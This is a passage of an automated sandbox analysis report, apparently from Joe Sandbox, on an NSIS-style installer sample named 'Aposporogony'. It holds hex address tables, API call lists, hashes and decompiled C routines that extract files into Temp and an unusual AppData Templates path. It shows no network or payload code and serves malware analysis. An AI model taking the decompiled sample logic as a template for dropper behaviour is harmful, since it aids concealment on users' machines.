                                                                                                                                                                                      0x00406564
                                                                                                                                                                                      0x004065c1
                                                                                                                                                                                      0x004065c1
                                                                                                                                                                                      0x004065c3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406568
                                                                                                                                                                                      0x0040656f
                                                                                                                                                                                      0x00406570
                                                                                                                                                                                      0x00406572
                                                                                                                                                                                      0x0040658c
                                                                                                                                                                                      0x0040659a
                                                                                                                                                                                      0x004065a0
                                                                                                                                                                                      0x004065a2
                                                                                                                                                                                      0x004065bd
                                                                                                                                                                                      0x004065bd
                                                                                                                                                                                      0x004065bd
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004065bd
                                                                                                                                                                                      0x004065a8
                                                                                                                                                                                      0x004065b3
                                                                                                                                                                                      0x004065b9
                                                                                                                                                                                      0x004065bb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004065bb
                                                                                                                                                                                      0x00406574
                                                                                                                                                                                      0x00406577
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406586
                                                                                                                                                                                      0x00406588
                                                                                                                                                                                      0x0040658a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040658a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004065c1
                                                                                                                                                                                      0x0040654b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406507
                                                                                                                                                                                      0x00406525
                                                                                                                                                                                      0x0040652a
                                                                                                                                                                                      0x0040652e
                                                                                                                                                                                      0x004065ce
                                                                                                                                                                                      0x004065ce
                                                                                                                                                                                      0x004065d1
                                                                                                                                                                                      0x004065d9
                                                                                                                                                                                      0x004065d9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004065d1
                                                                                                                                                                                      0x00406536
                                                                                                                                                                                      0x004065c5
                                                                                                                                                                                      0x004065c5
                                                                                                                                                                                      0x004065c9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004065cb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004065cb
                                                                                                                                                                                      0x00406505
                                                                                                                                                                                      0x004064d9
                                                                                                                                                                                      0x004064de
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004064e0
                                                                                                                                                                                      0x004064e3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004064e5
                                                                                                                                                                                      0x004064e8
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004064ea
                                                                                                                                                                                      0x004064ea
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004064ea
                                                                                                                                                                                      0x004064e8
                                                                                                                                                                                      0x00406662
                                                                                                                                                                                      0x0040666d
                                                                                                                                                                                      0x00406679
                                                                                                                                                                                      0x00406679
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040654B
                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll,?,00405487,Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll,00000000), ref: 0040655E
                                                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll,?,00405487,Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll,00000000), ref: 0040659A
                                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004065A8
                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                                                                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                                                                                                      • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll,?,00405487,Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll,00000000), ref: 00406631
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                      • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                      • API String ID: 717251189-1948552098
                                                                                                                                                                                      • Opcode ID: a2b01db3f60f7f954ff39a6d01daadad3aad0d9bd747aef2f55d2b9b332750a0
                                                                                                                                                                                      • Instruction ID: cc84c68a284476d24e00a3f01d451b35d35df0cd5868c7a223589be4a576710b
                                                                                                                                                                                      • Opcode Fuzzy Hash: a2b01db3f60f7f954ff39a6d01daadad3aad0d9bd747aef2f55d2b9b332750a0
                                                                                                                                                                                      • Instruction Fuzzy Hash: C7612371A00111ABDF209F64DD41AAE37A5AF50314F62813FE903B62D0E73E9AA2C75D
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 780 40176f-401794 call 402c41 call 405d34 785 401796-40179c call 4063e8 780->785 786 40179e-4017b0 call 4063e8 call 405cbd lstrcatW 780->786 791 4017b5-4017b6 call 40667c 785->791 786->791 795 4017bb-4017bf 791->795 796 4017c1-4017cb call 40672b 795->796 797 4017f2-4017f5 795->797 804 4017dd-4017ef 796->804 805 4017cd-4017db CompareFileTime 796->805 799 4017f7-4017f8 call 405eb9 797->799 800 4017fd-401819 call 405ede 797->800 799->800 807 40181b-40181e 800->807 808 40188d-4018b6 call 405450 call 4031d6 800->808 804->797 805->804 810 401820-40185e call 4063e8 * 2 call 40640a call 4063e8 call 405a4e 807->810 811 40186f-401879 call 405450 807->811 822 4018b8-4018bc 808->822 823 4018be-4018ca SetFileTime 808->823 810->795 844 401864-401865 810->844 820 401882-401888 811->820 824 402ace 820->824 822->823 826 4018d0-4018db CloseHandle 822->826 823->826 830 402ad0-402ad4 824->830 828 4018e1-4018e4 826->828 829 402ac5-402ac8 826->829 832 4018e6-4018f7 call 40640a lstrcatW 828->832 833 4018f9-4018fc call 40640a 828->833 829->824 839 401901-4022f2 832->839 833->839 842 4022f7-4022fc 839->842 843 4022f2 call 405a4e 839->843 842->830 843->842 844->820 845 401867-401868 844->845 845->811
                                                                                                                                                                                      C-Code - Quality: 77%
                                                                                                                                                                                      			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                      				void* _t35;
                                                                                                                                                                                      				void* _t43;
                                                                                                                                                                                      				void* _t45;
                                                                                                                                                                                      				FILETIME* _t51;
                                                                                                                                                                                      				FILETIME* _t64;
                                                                                                                                                                                      				void* _t66;
                                                                                                                                                                                      				signed int _t72;
                                                                                                                                                                                      				FILETIME* _t73;
                                                                                                                                                                                      				FILETIME* _t77;
                                                                                                                                                                                      				signed int _t79;
                                                                                                                                                                                      				void* _t81;
                                                                                                                                                                                      				void* _t82;
                                                                                                                                                                                      				WCHAR* _t84;
                                                                                                                                                                                      				void* _t86;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t77 = __ebx;
                                                                                                                                                                                      				 *(_t86 - 8) = E00402C41(0x31);
                                                                                                                                                                                      				 *(_t86 + 8) =  *(_t86 - 0x28) & 0x00000007;
                                                                                                                                                                                      				_t35 = E00405D34( *(_t86 - 8));
                                                                                                                                                                                      				_push( *(_t86 - 8));
                                                                                                                                                                                      				_t84 = L"Call";
                                                                                                                                                                                      				if(_t35 == 0) {
                                                                                                                                                                                      					lstrcatW(E00405CBD(E004063E8(_t84, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Ogtiern\\Hamiltonianism\\Scups")), ??);
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					E004063E8();
                                                                                                                                                                                      				}
                                                                                                                                                                                      				E0040667C(_t84);
                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                      					__eflags =  *(_t86 + 8) - 3;
                                                                                                                                                                                      					if( *(_t86 + 8) >= 3) {
                                                                                                                                                                                      						_t66 = E0040672B(_t84);
                                                                                                                                                                                      						_t79 = 0;
                                                                                                                                                                                      						__eflags = _t66 - _t77;
                                                                                                                                                                                      						if(_t66 != _t77) {
                                                                                                                                                                                      							_t73 = _t66 + 0x14;
                                                                                                                                                                                      							__eflags = _t73;
                                                                                                                                                                                      							_t79 = CompareFileTime(_t73, _t86 - 0x1c);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						asm("sbb eax, eax");
                                                                                                                                                                                      						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                                                                                                                                                      						__eflags = _t72;
                                                                                                                                                                                      						 *(_t86 + 8) = _t72;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					__eflags =  *(_t86 + 8) - _t77;
                                                                                                                                                                                      					if( *(_t86 + 8) == _t77) {
                                                                                                                                                                                      						E00405EB9(_t84);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					__eflags =  *(_t86 + 8) - 1;
                                                                                                                                                                                      					_t43 = E00405EDE(_t84, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                                                                                                                                                      					__eflags = _t43 - 0xffffffff;
                                                                                                                                                                                      					 *(_t86 - 0x30) = _t43;
                                                                                                                                                                                      					if(_t43 != 0xffffffff) {
                                                                                                                                                                                      						break;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					__eflags =  *(_t86 + 8) - _t77;
                                                                                                                                                                                      					if( *(_t86 + 8) != _t77) {
                                                                                                                                                                                      						E00405450(0xffffffe2,  *(_t86 - 8));
                                                                                                                                                                                      						__eflags =  *(_t86 + 8) - 2;
                                                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                                                      							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						L31:
                                                                                                                                                                                      						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
                                                                                                                                                                                      						__eflags =  *0x42a2e8;
                                                                                                                                                                                      						goto L32;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						E004063E8("C:\Users\Arthur\AppData\Local\Temp\nsm2525.tmp", _t81);
                                                                                                                                                                                      						E004063E8(_t81, _t84);
                                                                                                                                                                                      						E0040640A(_t77, _t81, _t84, "C:\Users\Arthur\AppData\Local\Temp\nsm2525.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x14)));
                                                                                                                                                                                      						E004063E8(_t81, "C:\Users\Arthur\AppData\Local\Temp\nsm2525.tmp");
                                                                                                                                                                                      						_t64 = E00405A4E("C:\Users\Arthur\AppData\Local\Temp\nsm2525.tmp\System.dll",  *(_t86 - 0x28) >> 3) - 4;
                                                                                                                                                                                      						__eflags = _t64;
                                                                                                                                                                                      						if(_t64 == 0) {
                                                                                                                                                                                      							continue;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							__eflags = _t64 == 1;
                                                                                                                                                                                      							if(_t64 == 1) {
                                                                                                                                                                                      								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
                                                                                                                                                                                      								L32:
                                                                                                                                                                                      								_t51 = 0;
                                                                                                                                                                                      								__eflags = 0;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_push(_t84);
                                                                                                                                                                                      								_push(0xfffffffa);
                                                                                                                                                                                      								E00405450();
                                                                                                                                                                                      								L29:
                                                                                                                                                                                      								_t51 = 0x7fffffff;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      					L33:
                                                                                                                                                                                      					return _t51;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				E00405450(0xffffffea,  *(_t86 - 8));
                                                                                                                                                                                      				 *0x42a314 =  *0x42a314 + 1;
                                                                                                                                                                                      				_t45 = E004031D6(_t79,  *((intOrPtr*)(_t86 - 0x20)),  *(_t86 - 0x30), _t77, _t77); // executed
                                                                                                                                                                                      				 *0x42a314 =  *0x42a314 - 1;
                                                                                                                                                                                      				__eflags =  *(_t86 - 0x1c) - 0xffffffff;
                                                                                                                                                                                      				_t82 = _t45;
                                                                                                                                                                                      				if( *(_t86 - 0x1c) != 0xffffffff) {
                                                                                                                                                                                      					L22:
                                                                                                                                                                                      					SetFileTime( *(_t86 - 0x30), _t86 - 0x1c, _t77, _t86 - 0x1c); // executed
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					__eflags =  *((intOrPtr*)(_t86 - 0x18)) - 0xffffffff;
                                                                                                                                                                                      					if( *((intOrPtr*)(_t86 - 0x18)) != 0xffffffff) {
                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				CloseHandle( *(_t86 - 0x30)); // executed
                                                                                                                                                                                      				__eflags = _t82 - _t77;
                                                                                                                                                                                      				if(_t82 >= _t77) {
                                                                                                                                                                                      					goto L31;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					__eflags = _t82 - 0xfffffffe;
                                                                                                                                                                                      					if(_t82 != 0xfffffffe) {
                                                                                                                                                                                      						E0040640A(_t77, _t82, _t84, _t84, 0xffffffee);
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						E0040640A(_t77, _t82, _t84, _t84, 0xffffffe9);
                                                                                                                                                                                      						lstrcatW(_t84,  *(_t86 - 8));
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_push(0x200010);
                                                                                                                                                                                      					_push(_t84);
                                                                                                                                                                                      					E00405A4E();
                                                                                                                                                                                      					goto L29;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				goto L33;
                                                                                                                                                                                      			}


















                                                                                                                                                                                      0x0040176f
                                                                                                                                                                                      0x00401776
                                                                                                                                                                                      0x00401782
                                                                                                                                                                                      0x00401785
                                                                                                                                                                                      0x0040178a
                                                                                                                                                                                      0x0040178d
                                                                                                                                                                                      0x00401794
                                                                                                                                                                                      0x004017b0
                                                                                                                                                                                      0x00401796
                                                                                                                                                                                      0x00401797
                                                                                                                                                                                      0x00401797
                                                                                                                                                                                      0x004017b6
                                                                                                                                                                                      0x004017bb
                                                                                                                                                                                      0x004017bb
                                                                                                                                                                                      0x004017bf
                                                                                                                                                                                      0x004017c2
                                                                                                                                                                                      0x004017c7
                                                                                                                                                                                      0x004017c9
                                                                                                                                                                                      0x004017cb
                                                                                                                                                                                      0x004017d0
                                                                                                                                                                                      0x004017d0
                                                                                                                                                                                      0x004017db
                                                                                                                                                                                      0x004017db
                                                                                                                                                                                      0x004017ec
                                                                                                                                                                                      0x004017ee
                                                                                                                                                                                      0x004017ee
                                                                                                                                                                                      0x004017ef
                                                                                                                                                                                      0x004017ef
                                                                                                                                                                                      0x004017f2
                                                                                                                                                                                      0x004017f5
                                                                                                                                                                                      0x004017f8
                                                                                                                                                                                      0x004017f8
                                                                                                                                                                                      0x004017ff
                                                                                                                                                                                      0x0040180e
                                                                                                                                                                                      0x00401813
                                                                                                                                                                                      0x00401816
                                                                                                                                                                                      0x00401819
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040181b
                                                                                                                                                                                      0x0040181e
                                                                                                                                                                                      0x00401874
                                                                                                                                                                                      0x00401879
                                                                                                                                                                                      0x004015b6
                                                                                                                                                                                      0x0040288b
                                                                                                                                                                                      0x0040288b
                                                                                                                                                                                      0x00402ac5
                                                                                                                                                                                      0x00402ac8
                                                                                                                                                                                      0x00402ac8
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00401820
                                                                                                                                                                                      0x00401826
                                                                                                                                                                                      0x0040182d
                                                                                                                                                                                      0x0040183a
                                                                                                                                                                                      0x00401845
                                                                                                                                                                                      0x0040185b
                                                                                                                                                                                      0x0040185b
                                                                                                                                                                                      0x0040185e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00401864
                                                                                                                                                                                      0x00401864
                                                                                                                                                                                      0x00401865
                                                                                                                                                                                      0x00401882
                                                                                                                                                                                      0x00402ace
                                                                                                                                                                                      0x00402ace
                                                                                                                                                                                      0x00402ace
                                                                                                                                                                                      0x00401867
                                                                                                                                                                                      0x00401867
                                                                                                                                                                                      0x00401868
                                                                                                                                                                                      0x00401493
                                                                                                                                                                                      0x004022f7
                                                                                                                                                                                      0x004022f7
                                                                                                                                                                                      0x004022f7
                                                                                                                                                                                      0x00401865
                                                                                                                                                                                      0x0040185e
                                                                                                                                                                                      0x00402ad0
                                                                                                                                                                                      0x00402ad4
                                                                                                                                                                                      0x00402ad4
                                                                                                                                                                                      0x00401892
                                                                                                                                                                                      0x00401897
                                                                                                                                                                                      0x004018a5
                                                                                                                                                                                      0x004018aa
                                                                                                                                                                                      0x004018b0
                                                                                                                                                                                      0x004018b4
                                                                                                                                                                                      0x004018b6
                                                                                                                                                                                      0x004018be
                                                                                                                                                                                      0x004018ca
                                                                                                                                                                                      0x004018b8
                                                                                                                                                                                      0x004018b8
                                                                                                                                                                                      0x004018bc
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004018bc
                                                                                                                                                                                      0x004018d3
                                                                                                                                                                                      0x004018d9
                                                                                                                                                                                      0x004018db
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004018e1
                                                                                                                                                                                      0x004018e1
                                                                                                                                                                                      0x004018e4
                                                                                                                                                                                      0x004018fc
                                                                                                                                                                                      0x004018e6
                                                                                                                                                                                      0x004018e9
                                                                                                                                                                                      0x004018f2
                                                                                                                                                                                      0x004018f2
                                                                                                                                                                                      0x00401901
                                                                                                                                                                                      0x00401906
                                                                                                                                                                                      0x004022f2
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004022f2
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Ogtiern\Hamiltonianism\Scups,?,?,00000031), ref: 004017D5
                                                                                                                                                                                        • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                                                                                        • Part of subcall function 00405450: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll,00402F08), ref: 004054AB
                                                                                                                                                                                        • Part of subcall function 00405450: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll), ref: 004054BD
                                                                                                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsm2525.tmp$C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Ogtiern\Hamiltonianism\Scups$Call
                                                                                                                                                                                      • API String ID: 1941528284-2742421080
                                                                                                                                                                                      • Opcode ID: 02bb0d5c00f90472de9749025c2f18da1922c30cf82dee87e3949fe2f46c1c22
                                                                                                                                                                                      • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                                                                                                      • Opcode Fuzzy Hash: 02bb0d5c00f90472de9749025c2f18da1922c30cf82dee87e3949fe2f46c1c22
                                                                                                                                                                                      • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 846 405450-405465 847 40546b-40547c 846->847 848 40551c-405520 846->848 849 405487-405493 lstrlenW 847->849 850 40547e-405482 call 40640a 847->850 852 4054b0-4054b4 849->852 853 405495-4054a5 lstrlenW 849->853 850->849 855 4054c3-4054c7 852->855 856 4054b6-4054bd SetWindowTextW 852->856 853->848 854 4054a7-4054ab lstrcatW 853->854 854->852 857 4054c9-40550b SendMessageW * 3 855->857 858 40550d-40550f 855->858 856->855 857->858 858->848 859 405511-405514 858->859 859->848
                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E00405450(signed int _a4, WCHAR* _a8) {
                                                                                                                                                                                      				struct HWND__* _v8;
                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                      				WCHAR* _v32;
                                                                                                                                                                                      				long _v44;
                                                                                                                                                                                      				int _v48;
                                                                                                                                                                                      				void* _v52;
                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                      				WCHAR* _t27;
                                                                                                                                                                                      				signed int _t28;
                                                                                                                                                                                      				long _t29;
                                                                                                                                                                                      				signed int _t37;
                                                                                                                                                                                      				signed int _t38;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t27 =  *0x429224;
                                                                                                                                                                                      				_v8 = _t27;
                                                                                                                                                                                      				if(_t27 != 0) {
                                                                                                                                                                                      					_t37 =  *0x42a314;
                                                                                                                                                                                      					_v12 = _t37;
                                                                                                                                                                                      					_t38 = _t37 & 0x00000001;
                                                                                                                                                                                      					if(_t38 == 0) {
                                                                                                                                                                                      						E0040640A(_t38, 0, 0x422708, 0x422708, _a4);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t27 = lstrlenW(0x422708);
                                                                                                                                                                                      					_a4 = _t27;
                                                                                                                                                                                      					if(_a8 == 0) {
                                                                                                                                                                                      						L6:
                                                                                                                                                                                      						if((_v12 & 0x00000004) == 0) {
                                                                                                                                                                                      							_t27 = SetWindowTextW( *0x429208, 0x422708); // executed
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if((_v12 & 0x00000002) == 0) {
                                                                                                                                                                                      							_v32 = 0x422708;
                                                                                                                                                                                      							_v52 = 1;
                                                                                                                                                                                      							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
                                                                                                                                                                                      							_v44 = 0;
                                                                                                                                                                                      							_v48 = _t29 - _t38;
                                                                                                                                                                                      							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
                                                                                                                                                                                      							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if(_t38 != 0) {
                                                                                                                                                                                      							_t28 = _a4;
                                                                                                                                                                                      							0x422708[_t28] = 0;
                                                                                                                                                                                      							return _t28;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_t27 = lstrlenW(_a8) + _a4;
                                                                                                                                                                                      						if(_t27 < 0x1000) {
                                                                                                                                                                                      							_t27 = lstrcatW(0x422708, _a8);
                                                                                                                                                                                      							goto L6;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				return _t27;
                                                                                                                                                                                      			}

















                                                                                                                                                                                      0x00405456
                                                                                                                                                                                      0x00405460
                                                                                                                                                                                      0x00405465
                                                                                                                                                                                      0x0040546b
                                                                                                                                                                                      0x00405476
                                                                                                                                                                                      0x00405479
                                                                                                                                                                                      0x0040547c
                                                                                                                                                                                      0x00405482
                                                                                                                                                                                      0x00405482
                                                                                                                                                                                      0x00405488
                                                                                                                                                                                      0x00405490
                                                                                                                                                                                      0x00405493
                                                                                                                                                                                      0x004054b0
                                                                                                                                                                                      0x004054b4
                                                                                                                                                                                      0x004054bd
                                                                                                                                                                                      0x004054bd
